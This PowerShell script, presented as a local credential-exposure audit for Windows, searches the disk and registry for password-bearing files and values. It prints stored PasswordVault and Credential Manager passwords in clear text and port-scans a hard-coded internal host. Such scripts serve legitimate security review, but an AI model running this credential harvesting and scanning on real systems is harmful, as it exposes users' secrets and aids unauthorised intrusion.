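# Local credential-exposure checks for a Windows host (PowerShell 3.0 or later:
# the script relies on Get-ChildItem -File and [pscustomobject]).
# The first five sections run as soon as the script is executed; the three
# functions at the end are only defined and have to be called explicitly.
#
# Review notes:
#   * Every check runs as the current user, so a hit shows what that user, or
#     anything running as that user, can already read.
#   * The script walks all of C:\ and all of HKLM:\ / HKCU:\ recursively. When
#     PowerShell script block logging is enabled, the script text is recorded
#     under event ID 4104.
#   * -ErrorAction SilentlyContinue hides access-denied errors, so an empty
#     result does not prove that no matching file or value exists.
#   * Several sections print secrets in clear text. Treat saved output and
#     transcripts as sensitive.

# Find Potentially Interesting Files
# Matches on file name only; file contents are not inspected here.
Write-Host "Finding Potentially Interesting Files" -ForegroundColor Yellow
Get-ChildItem c:\ -Include *pass*.txt,*pass*.xml,*pass*.ini,*pass*.xlsx,*cred*,*vnc*,*.config*,*accounts* -File -Recurse -ErrorAction SilentlyContinue

# Find Credentials in Sysprep or Unattend Files
# Answer files left behind after imaging can hold setup account passwords;
# deleting them once deployment has finished removes this finding.
Write-Host "Finding Credentials in Sysprep or Unattend Files" -ForegroundColor Yellow
Get-ChildItem c:\ -Include *sysprep.inf,*sysprep.xml,*sysprep.txt,*unattended.xml,*unattend.xml,*unattend.txt -File -Recurse -ErrorAction SilentlyContinue

# Get stored passwords from Windows PasswordVault
# The type literal loads the WinRT class (the type object itself is also written
# to the output). RetrievePassword() fills in the Password property of each
# entry before the entry is emitted.
Write-Host "Get Stored Passwords From Windows PasswordVault" -ForegroundColor Yellow
[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
(New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll() |
    ForEach-Object {
        $_.RetrievePassword()
        $_
    }

# Get Stored Passwords From Windows Credential Manager
# Get-StoredCredential is not a built-in cmdlet; it comes from the separate
# CredentialManager module, and this section fails if that module is absent.
Write-Host "Get Stored Passwords From Windows Credential Manager" -ForegroundColor Yellow
Get-StoredCredential |
    ForEach-Object {
        Write-Host -NoNewLine $_.username
        Write-Host -NoNewLine ":"
        # Reset first: $p survives between iterations, so a failed conversion
        # would otherwise reuse the previous entry's pointer.
        $p = [IntPtr]::Zero
        $p = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($_.password)
        if ($p -ne [IntPtr]::Zero) {
            [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($p)
            # Zero and release the unmanaged copy so the clear-text password
            # does not stay behind in process memory.
            [System.Runtime.InteropServices.Marshal]::ZeroFreeBSTR($p)
        }
    }

# Port Scan a Host for Interesting Ports
# TcpClient.Connect performs a full TCP connect, so every open port produces an
# ordinary connection record on the target. Failed connects raise errors that
# the trailing 2>$null discards; only successful connects reach the message.
Write-Host "Port Scan a Host for Interesting Ports" -ForegroundColor Yellow
$ports = "21 22 23 25 53 80 88 111 139 389 443 445 873 1099 1433 1521 1723 2049 2100 2121 3299 3306 3389 3632 4369 5038 5060 5432 5555 5900 5985 6000 6379 6667 8000 8080 8443 9200 27017"
$ip = "10.1.0.4"
$ports.split(" ") |
    ForEach-Object {
        $client = New-Object Net.Sockets.TcpClient
        Write-Output ($client.Connect($ip, $_)) "Port $_ is open on $ip"
        # Release the socket whether or not the connect succeeded; the original
        # left one unclosed TcpClient behind per port.
        $client.Close()
    } 2>$null

# Potential Credentials Files
# Returns the full paths of files under C:\ whose names match the patterns.
# Directories are filtered out by the PSIsContainer test.
function Find-CredFiles {
    Write-Host "Finding Potential Credentials Files" -ForegroundColor Yellow
    return (Get-ChildItem c:\ -Recurse -Include *pass*, *cred*, *.config*, *vnc* -ErrorAction SilentlyContinue |
        Where-Object { -not $_.PSIsContainer } |
        Select-Object FullName).FullName
}

# Files With 'Password' String
# Returns one object per matching line (FilePath, LineNumber, Line) from .xml,
# .ini and .txt files under C:\. Select-String matches case-insensitively by
# default. Line carries the matched text itself, so the result holds whatever
# secret was found.
function Find-PasswordFiles {
    Write-Host "Finding Files With 'Password' String" -ForegroundColor Yellow
    $hits = Get-ChildItem c:\ -Recurse -Include *.xml, *.ini, *.txt -ErrorAction SilentlyContinue |
        Select-String -Pattern "password" -ErrorAction SilentlyContinue
    # Collect through the foreach expression instead of growing an array with
    # +=, which copies the whole array on every match.
    $passlist = @(foreach ($hit in $hits) {
        [pscustomobject]@{
            FilePath   = $hit.Path
            LineNumber = $hit.LineNumber
            Line       = $hit.Line
        }
    })
    return $passlist
}

# Registry Values With 'Password' String
# Walks HKLM:\ and HKCU:\ and returns every value whose NAME matches 'password'
# (case-insensitive). Value data is not searched.
function Find-RegPasswords {
    Write-Host "Finding Registry Values With 'Password' String" -ForegroundColor Yellow
    return Get-ChildItem -Path HKLM:\,HKCU:\ -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $regKey = $_
            $regKey.GetValueNames() |
                Where-Object { $_ -match 'password' } |
                ForEach-Object {
                    # -Property * is required: Windows PowerShell 5.1 and
                    # earlier ignore -ExcludeProperty when -Property is absent.
                    Get-ItemProperty $regKey.PSPath -Name $_ |
                        Select-Object -Property * -ExcludeProperty PSProvider,PSChildName,PSParentPath
                }
        }
}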